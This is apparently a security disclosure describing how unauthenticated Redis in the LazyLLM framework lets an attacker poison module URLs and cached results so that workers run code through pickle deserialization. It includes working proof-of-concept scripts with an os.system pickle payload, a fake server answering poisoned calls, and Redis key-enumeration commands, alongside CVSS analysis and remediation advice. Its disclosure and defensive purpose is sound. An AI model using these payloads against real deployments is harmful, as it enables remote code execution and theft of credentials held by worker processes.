Unauthenticated Distributed Control Plane Allows Cluster-Wide Code Execution via Redis Service Registry Poisoning in LazyLLM
Summary
LazyLLM (LazyAGI/LazyLLM, 3.7k stars) uses Redis as an unauthenticated distributed control plane for module service discovery and result caching. An attacker with network access to the Redis instance can achieve Remote Code Execution on every LazyLLM worker in the deployment through two independent attack chains:
- Service Registry Poisoning: Module URLs are stored in Redis without authentication or integrity verification. An attacker overwrites a module's registered URL, redirecting all inter-module communication to an attacker-controlled server. The calling module deserializes the response with pickle.loads(), which can execute arbitrary code during deserialization. The _call() code path lacks the Security-Key header protection that forward() implements, so the attacker's server receives trusted requests without authentication.
- Cache Poisoning: Module execution results are cached in Redis via pickle.dumps() and read back via pickle.loads(). An attacker writes a malicious serialized payload to a predictable cache key. Any worker that reads that entry from cache executes the payload.
Both chains require only network adjacency to the Redis instance. Default LazyLLM deployments use redis://host:6379 without authentication, TLS, or integrity verification. No warnings are emitted when connecting without credentials.
Framing
This report is not "pickle can execute code." That is well-known and would correctly be triaged as low-novelty.
This report is: network-originated authority is fed into pickle without authentication or integrity controls.
Specifically:
- The bytes deserialized originate from Redis (network).
- Redis content is treated as an authoritative module registry and authoritative response cache (trust).
- The _call() path consumes registry-resolved URLs without Security-Key enforcement, while forward() does enforce it (auth asymmetry: an internal inconsistency in LazyLLM's own threat model).
- The returned bytes flow directly into pickle.loads() (sink).
The defect is the storage / execution boundary collapse between the distributed control plane and the worker execution context. Pickle is the mechanism. The vulnerability is the missing authentication of the authority that selects what gets unpickled.
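The mechanism behind the sink can be shown with a harmless stand-in. The sketch below is illustrative only and is not LazyLLM code: `BenignPayload` is a hypothetical class whose `__reduce__` names `operator.add` as the callable, so `pickle.loads()` ends up calling a function chosen by whoever produced the bytes. A hostile producer would simply name a different callable.

```python
import operator
import pickle


class BenignPayload:
    """Hypothetical stand-in: asks pickle to call operator.add(40, 2) on load."""

    def __reduce__(self):
        # (callable, args): the unpickler invokes callable(*args) during loads()
        return (operator.add, (40, 2))


blob = pickle.dumps(BenignPayload())

# The reader never asked for an addition; the bytes decided what to call.
result = pickle.loads(blob)
print(type(result).__name__, result)  # int 42
```

The reader gets back an `int`, not a `BenignPayload`: the call happened inside `loads()`, before any application code could inspect the value.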
Architecture: How LazyLLM Uses Redis
┌──────────────┐      ┌──────────────────────┐      ┌──────────────┐
│  Module A    │─────▶│  Redis (no auth)     │◀─────│  Module B    │
│  (worker)    │      │                      │      │  (worker)    │
│              │      │  url:module_B = ...  │      │              │
│ 1. lookup    │      │  cache:key = ...     │      │              │
│    URL for   │      │                      │      │              │
│    module B  │      └──────────────────────┘      └──────────────┘
│              │                 ▲
│ 2. call      │                 │
│    module B  │      ┌──────────┴───────────┐
│    at URL    │      │  ATTACKER            │
│              │      │                      │
│ 3. pickle.   │      │  Overwrites:         │
│    loads()   │      │  • url:module_B      │
│    response  │      │    → evil server     │
└──────┬───────┘      │  • cache:key         │
       │              │    → pickle payload  │
       ▼              └──────────────────────┘
   RCE on A
(propagates to all workers reading cache or calling modules)
Key architectural facts:
- Redis is the sole service discovery mechanism (servermodule.py:180-181)
- Redis is the sole cache backend when configured (module.py:170-177)
- No authentication is required or warned about (redis_client.py:12)
- No TLS, integrity check, or HMAC on stored data
- Cache keys follow a predictable pattern: module@{key}:{hash_key}
- Module URL keys follow a predictable pattern: url:{module_id}
Affected Component
CVSS
9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- AV:N — Redis is network-accessible in standard deployments (docker-compose, k8s pod networks, VPC)
- AC:L — No race conditions, no complex prerequisites
- PR:N — Redis default: no authentication
- UI:N — Fully automated exploitation
- S:U — Scope unchanged (execution within LazyLLM worker context)
- C:H/I:H/A:H — Full code execution on every worker
Note: If a triager argues that Redis requires network adjacency, changing AV:N to AV:A lowers the score to 8.8, which the CVSS v3.1 scale rates High rather than Critical. The finding remains severe regardless.
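The two scores can be reproduced from the CVSS v3.1 base-score equations. The sketch below covers only scope-unchanged (S:U) vectors and uses the metric weights and round-up rule as published in the CVSS v3.1 specification; the function names are illustrative.

```python
import math

# CVSS v3.1 metric weights for scope-unchanged vectors
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place using the integer method from the v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(av, ac, pr, ui, c, i, a) -> float:
    """Base score for an S:U vector."""
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


def rating(score: float) -> str:
    """Qualitative severity rating scale from CVSS v3.1."""
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


for av in ("N", "A"):
    score = base_score(av, "L", "N", "N", "H", "H", "H")
    print(f"AV:{av} -> {score} ({rating(score)})")
```

Only the Attack Vector weight differs between the two vectors (0.85 versus 0.62), which is what moves the result across the 9.0 boundary.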
CWE
- CWE-502: Deserialization of Untrusted Data
- CWE-306: Missing Authentication for Critical Function (Redis service registry)
- CWE-345: Insufficient Verification of Data Authenticity (no HMAC/signature on cached data)
Chain 1: Service Registry Poisoning → Module Impersonation → RCE
Step 1: URL stored in Redis without authentication
# servermodule.py:209-213
def _set_url(self, url):
    if _redis_client:
        redis_client['url'].set(self._url_id, url)  # No auth, no HMAC
    self._url_wrapper.url = url
Step 2: URL read from Redis without validation
# servermodule.py:200-201
url = redis_client['url'].get(self._url_id)
self._url_wrapper.url = url.decode('utf-8') if url else None # Trusts Redis blindly
Step 3: _call() sends request to URL WITHOUT Security-Key
# servermodule.py:418-428
def _call(self, fname, *args, **kwargs):
    args, kwargs = lazyllm.dump_obj(args), lazyllm.dump_obj(kwargs)
    url = urljoin(self._url.rsplit('/', 1)[0], '_call')
    r = requests.post(url, json=(fname, args, kwargs), ...)  # NO Security-Key header
    ...
    return pickle.loads(codecs.decode(r.content, 'base64'))  # RCE
Critical access control gap: forward() (lines 430-435) sends a Security-Key header; _call() (lines 418-428) does not. An attacker's impersonation server therefore receives the request without needing to know the security key.
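To make the redirect concrete, the sketch below mirrors only the URL expression quoted from _call() in Step 3 and applies it to two registry values. `derive_call_url` is a hypothetical helper name, and the first address is an invented example of a legitimate worker; the second is the value PoC 2 writes to Redis.

```python
from urllib.parse import urljoin, urlparse


def derive_call_url(registered_url: str) -> str:
    """Mirror the quoted expression: drop the last path segment, append '_call'."""
    return urljoin(registered_url.rsplit('/', 1)[0], '_call')


legit = derive_call_url("http://10.0.0.5:8000/generate")      # hypothetical worker address
poisoned = derive_call_url("http://127.0.0.1:18999/forward")  # registry value from PoC 2

print(legit)                       # http://10.0.0.5:8000/_call
print(poisoned)                    # http://127.0.0.1:18999/_call
print(urlparse(poisoned).netloc)   # 127.0.0.1:18999
```

The host and port come entirely from the registry entry, so whoever controls that entry chooses which server answers the `_call` request.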
Step 4: Streaming variant
# servermodule.py:264-266
def _decode_line(self, line: bytes):
    return pickle.loads(codecs.decode(line, 'base64'))  # Every streaming line deserialized
Chain 2: Cache Poisoning → RCE
# module.py:163-178
class _RedisCacheStrategy(_CacheStorageStrategy):
    def get(self, key: str, hash_key: str):
        redis_key = self._get_redis_key(key, hash_key)
        value = self._client.get(redis_key)
        if value is None:
            raise CacheNotFoundError(...)
        return pickle.loads(value)  # Deserializes Redis data directly: RCE
Key predictability: Cache keys follow module@{key}:{hash_key}. URL keys follow url:{module_id}. Both prefixes are enumerable via KEYS * on unauthenticated Redis.
Insecure-by-Default Evidence
No authentication, no warning
# redis_client.py:4-14
lazyllm.config.add('redis_url', str, '', 'REDIS_URL',
                   description='The URL of the Redis server.')  # No auth guidance
_redis_url = lazyllm.config['redis_url']
if _redis_url:
    _redis_client = redis.Redis.from_url(_redis_url)  # No auth params, no TLS
    assert _redis_client.ping(), (
        'Found reids config but can not connect, ...')  # Note: typo "reids" (sic), suggesting an unreviewed code path
- redis.Redis.from_url() is called with the raw URL: no password, ssl, or ssl_cert_reqs parameters
- The config description is only "The URL of the Redis server.", with no guidance on authentication
- No startup warning when connecting without credentials
- No documentation of auth requirements anywhere in the repository (no Redis security mentions across docs/en/, docs/zh/, README.md, README.CN.md)
- No docker-compose file, k8s manifest, or deployment guide exists in the repository, so operators receive no deployment security guidance
- The only deployment parameter is the environment variable LAZYLLM_REDIS_URL=redis://host:6379
- A bare redis://host:6379 URL carries no credentials; operators must know to use redis://:password@host:6379 or rediss:// (TLS), and neither is mentioned anywhere
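A startup check of the kind the list above finds missing could look like the following. This is a minimal sketch, not LazyLLM code: `redis_url_findings` and `warn_if_insecure` are hypothetical names, and the check inspects only the URL string, so credentials supplied some other way would not be detected.

```python
import warnings
from urllib.parse import urlparse


def redis_url_findings(url: str) -> list:
    """Return human-readable concerns about a Redis URL (empty list if none)."""
    parsed = urlparse(url)
    findings = []
    if not parsed.password:
        findings.append("no password in URL")
    if parsed.scheme != "rediss":
        findings.append("transport is not TLS (scheme is not rediss://)")
    return findings


def warn_if_insecure(url: str) -> None:
    """Emit one warning per finding; intended to run once at startup."""
    host = urlparse(url).hostname
    for finding in redis_url_findings(url):
        warnings.warn(f"Redis at {host}: {finding}", stacklevel=2)


print(redis_url_findings("redis://host:6379"))
print(redis_url_findings("rediss://:s3cret@host:6379"))
```

Calling `warn_if_insecure` on the configured URL before the first connection would give operators a signal without changing connection behavior.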
Additional pickle-from-Redis chains (not required for this report, but demonstrates systemic pattern)
Globals subsystem (globals.py:259-264):
# globals.py:259,263 — RedisGlobals reads/writes global state via Redis
self._redis_client.set(self._get_redis_key(key), obj2str(self._data)) # obj2str = pickle.dumps + base64
self._data.update(str2obj(self._redis_client.get(...))) # str2obj = base64 + pickle.loads
Queue subsystem (queue.py:419-434): RedisQueue also uses redis.Redis.from_url() without authentication for task distribution.
These additional chains demonstrate that Redis-backed pickle deserialization is not isolated to caching — it is a systemic architectural pattern throughout LazyLLM's distributed coordination layer.
Distinct from Issue #764
| | Issue #764 (Sep 2025) | This submission (V178) |
|---|---|---|
| File | relay/server.py | module.py + servermodule.py |
| Sink | cloudpickle.loads via CLI | pickle.loads via Redis + HTTP |
| Entry point | Local RelayServer args | Network (Redis + HTTP) |
| Trust boundary | CLI → local process | Redis (network) → all workers |
| Scope | Single process | Cluster-wide propagation |
| Access control | N/A | _call() missing Security-Key |
Proof of Concept
Prerequisites
pip install lazyllm redis
docker run -d -p 6379:6379 redis:7-alpine # Unauthenticated Redis
export LAZYLLM_REDIS_URL=redis://localhost:6379
PoC 1: Cache Poisoning → Single Worker RCE
"""Demonstrates RCE via cache poisoning. Non-destructive: writes marker file."""
import os
import pickle

import redis


class RCEPayload:
    def __reduce__(self):
        return (os.system, ("echo SPRK3-V178-CACHE-RCE > /tmp/sprk3_v178_cache",))


r = redis.Redis.from_url(os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379"))
r.set("module@target_module:default_hash", pickle.dumps(RCEPayload()))

from lazyllm.module.module import _RedisCacheStrategy

cache = _RedisCacheStrategy()
try:
    cache.get("target_module", "default_hash")
except Exception:
    pass  # The payload runs during deserialization; later errors are expected
assert os.path.exists("/tmp/sprk3_v178_cache"), "RCE failed"
print("[+] Cache poisoning RCE confirmed")
os.remove("/tmp/sprk3_v178_cache")
PoC 2: Service Registry Poisoning → Cross-Process RCE
"""
Demonstrates cluster-wide RCE via service registry poisoning.
Process A: Attacker poisons Redis URL entry + runs fake HTTP server
Process B: Legitimate LazyLLM worker calls module → gets redirected → RCE
Sink fires through library: ServerModule._call() → servermodule.py:428
Run in two terminals:
Terminal 1: python3 poc_v178_registry_poison.py --attacker
Terminal 2: python3 poc_v178_registry_poison.py --victim
"""
import codecs
import os
import pickle
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer

import redis

REDIS_URL = os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379")
EVIL_PORT = 18999
MARKER = "/tmp/sprk3_v178_registry"
TARGET_MODULE_ID = "victim_module_001"


class RCEPayload:
    def __reduce__(self):
        return (os.system, (f"echo SPRK3-V178-REGISTRY-RCE-$(date +%s) > {MARKER}",))


class EvilHandler(BaseHTTPRequestHandler):
    """Responds to _call() with a pickle RCE payload."""

    def do_POST(self):
        payload = codecs.encode(pickle.dumps(RCEPayload()), 'base64')
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):
        pass  # Silence per-request logging


if '--attacker' in sys.argv:
    r = redis.Redis.from_url(REDIS_URL)
    # Poison the URL registry: redirect victim_module to our evil server
    r.set(f"url:{TARGET_MODULE_ID}", f"http://127.0.0.1:{EVIL_PORT}/forward")
    print(f"[+] Poisoned url:{TARGET_MODULE_ID} → http://127.0.0.1:{EVIL_PORT}")
    print(f"[+] Starting evil HTTP server on :{EVIL_PORT}")
    HTTPServer(('0.0.0.0', EVIL_PORT), EvilHandler).serve_forever()
elif '--victim' in sys.argv:
    # Resolve poisoned URL from Redis (servermodule.py:200-201)
    r = redis.Redis.from_url(REDIS_URL)
    url = r.get(f"url:{TARGET_MODULE_ID}")
    if url:
        url = url.decode('utf-8')
        print(f"[*] Resolved module URL from Redis: {url}")
        # Construct ServerModule with the poisoned URL and call via library
        # ServerModule._call() at servermodule.py:418-428:
        #   - POSTs to urljoin(url, '_call') WITHOUT Security-Key
        #   - Deserializes via pickle.loads(codecs.decode(r.content, 'base64'))
        from lazyllm.module.servermodule import ServerModule
        sm = ServerModule(url=url)
        try:
            sm._call('run')  # Sink fires through library, line 428
        except Exception:
            pass  # RCE fires during deserialization; post-deser exceptions expected
    if os.path.exists(MARKER):
        with open(MARKER) as marker_file:
            print(f"[+] CROSS-PROCESS RCE CONFIRMED: {marker_file.read().strip()}")
        print("    Sink: servermodule.py:428 pickle.loads (library-imported)")
        os.remove(MARKER)
    else:
        print("[-] RCE marker not found")
else:
    print("Usage: --attacker (terminal 1) or --victim (terminal 2)")
PoC 3: Key Enumeration
# All module URLs and cache entries are enumerable
redis-cli -h <target> KEYS "url:*"
redis-cli -h <target> KEYS "module@*"
# Returns every registered module and cached result in the cluster
Impact
Cluster-wide propagation: LazyLLM is designed for multi-agent LLM deployments where multiple modules communicate via Redis-stored URLs. Compromising Redis gives the attacker:
- Service impersonation — redirect any module's traffic to an attacker-controlled endpoint
- Cache poisoning — inject malicious payloads that execute on any worker reading from cache
- Lateral movement — RCE on one worker → poison Redis → RCE on every other worker
- Persistence — poisoned cache entries survive worker restarts
The access control gap amplifies this: _call() does not send Security-Key, so the attacker's impersonation server receives trusted inter-module calls without needing any credentials. This is not "pickle is dangerous" — this is an unauthenticated distributed control plane with no integrity verification on any data path.
Why This Matters in AI Infrastructure
LazyLLM is not a generic web service. It orchestrates autonomous agent and tool pipelines. Worker processes that consume Redis-distributed authority routinely handle:
- API keys and provider credentials (OpenAI, Anthropic, HuggingFace, cloud)
- Embedding stores and proprietary model artifacts
- Agent tool invocations with filesystem, shell, and network reach
- Downstream MCP / toolchain integrations that inherit worker trust
A single Redis write does not merely execute code on one node. It compromises the trust root of every agent the cluster serves: every tool call, every credential lookup, every downstream MCP server now runs under attacker authority. This is not "Python RCE" — it is autonomous-agent cluster takeover.
Anticipated Defenses
"Redis exposure is operator responsibility"
The vulnerability is not that Redis can be exposed. The vulnerability is that LazyLLM treats Redis contents as trusted executable authority without cryptographic verification — and does so silently, by default, with no warning to operators.
Even when Redis is intentionally internal-only, the contents of Redis become a code-execution oracle reachable through every adjacent compromise:
- SSRF in any worker-side HTTP handler that can reach Redis
- Compromised sidecar or co-tenant in the same VPC / k8s namespace
- Stolen Redis credentials — or no credentials at all, since LazyLLM's default deployment uses none
- One poisoned worker writing back to the registry (lateral propagation)
- Intra-cluster lateral movement originating from any unrelated CVE in the same trust zone
In every case, a write primitive against an "internal" Redis instance converts into cluster-wide RCE. The architectural defect is that the entire trust model of the cluster collapses to the integrity of one unauthenticated KV store.
Operators cannot fix this with network policy alone — network controls cannot defend against SSRF, sidecar compromise, or insider write primitives. Only the application can fix it, by authenticating the contents of Redis (signed cache values, verified registry entries), not merely its transport.
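As an illustration of what authenticating the contents could mean for cache values, the sketch below prefixes each value with an HMAC-SHA256 tag and refuses to return a payload whose tag does not verify. It is a minimal sketch under stated assumptions, not LazyLLM's API: `seal`, `unseal`, and the `context` parameter are hypothetical, and the key is assumed to be distributed to workers through a channel other than Redis.

```python
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def _mac(key: bytes, context: bytes, payload: bytes) -> bytes:
    # Length-prefix the context so (context, payload) pairs cannot be confused
    message = len(context).to_bytes(4, "big") + context + payload
    return hmac.new(key, message, hashlib.sha256).digest()


def seal(key: bytes, context: bytes, payload: bytes) -> bytes:
    """Return tag || payload, with the tag bound to context (e.g. the Redis key name)."""
    return _mac(key, context, payload) + payload


def unseal(key: bytes, context: bytes, blob: bytes) -> bytes:
    """Return the payload if the tag verifies; raise ValueError otherwise."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, _mac(key, context, payload)):
        raise ValueError("stored value failed integrity check")
    return payload


key = b"k" * 32  # placeholder; a real key would come from a secret store
blob = seal(key, b"module@target_module:default_hash", b"serialized-result")
print(unseal(key, b"module@target_module:default_hash", blob))
```

Binding the Redis key name into the tag means a validly signed value copied under a different key also fails verification. Verification would have to happen before any deserialization step for this to help.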
Public precedent for this class of dismissal failing: CVE-2026-41940 (cPanel/WHM) demonstrated that "trusted environment" vendor defenses are invalid once any adjacent primitive is reachable.
"Pickle is expected / trusted internal serialization"
The deserialization sink does not consume operator-supplied bytes. It consumes bytes selected by a network-resolved lookup against an unauthenticated KV store. The trust boundary is between the Redis-stored authority and the worker, not between the operator and the worker. See Framing section above.
CVSS scoring contention
A triager may argue for AV:A instead of AV:N, citing that Redis is typically internal-only. At AV:A the score drops to 8.8, which is High on the CVSS v3.1 scale. However, AV:N is justified because:
- LazyLLM emits no warning when connecting to an unauthenticated Redis
- LazyLLM emits no warning when LAZYLLM_REDIS_URL is set to a public-routable address
- The PyPI-installable package does not require any network-isolation step before exposing Redis on 0.0.0.0:6379
- Default docker run -d -p 6379:6379 redis:7-alpine from LazyLLM's own deployment pattern publishes Redis to all host interfaces
Whether AV:N or AV:A, the structural defect — unauthenticated network-originated bytes flowing into pickle — is unchanged.
Remediation
- Replace pickle with safe serialization: use json or msgpack for cache values and HTTP responses. If pickle is required, use a RestrictedUnpickler (a pickle.Unpickler subclass that overrides find_class) with a strict allowlist.
- Require Redis authentication: enforce requirepass or ACLs. Emit a startup WARNING when connecting without credentials. Document auth as mandatory, not optional.
- Sign cached data: HMAC cache values on write and verify on read. This prevents cache poisoning even if Redis is compromised, provided the signing key is not stored in Redis.
- Add Security-Key to _call(): _call() currently lacks the Security-Key header that forward() implements. Both code paths should enforce authentication.
- Validate registered URLs: verify module URLs against an allowlist or require mutual TLS for inter-module communication.
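The restricted-unpickler option in the first item follows the pattern shown in the Python pickle documentation: subclass pickle.Unpickler and override find_class so that only allowlisted globals can be resolved. The sketch below is one possible shape; the allowlist contents and the `restricted_loads` and `Probe` names are assumptions for illustration, and an allowlist reduces exposure rather than making pickle safe for untrusted input.

```python
import io
import operator
import pickle

# Hypothetical allowlist: only these (module, name) globals may be resolved.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global (class or function)
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Benign stand-in for a hostile object: asks pickle to call operator.add."""

    def __reduce__(self):
        return (operator.add, (1, 2))


# Plain containers and primitives never reach find_class, so they still load.
print(restricted_loads(pickle.dumps({"answer": [1, 2, 3]})))

try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Values that are plain dicts, lists, strings, and numbers round-trip unchanged, which is why moving such data to json or msgpack is usually the simpler fix.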
Timeline
- 2026-05-17: Vulnerability discovered by SPR{K}3 automated scanning (Ora nightly, Darwin-directed)
- 2026-05-25: Reported via GitHub issue (no private vulnerability reporting available)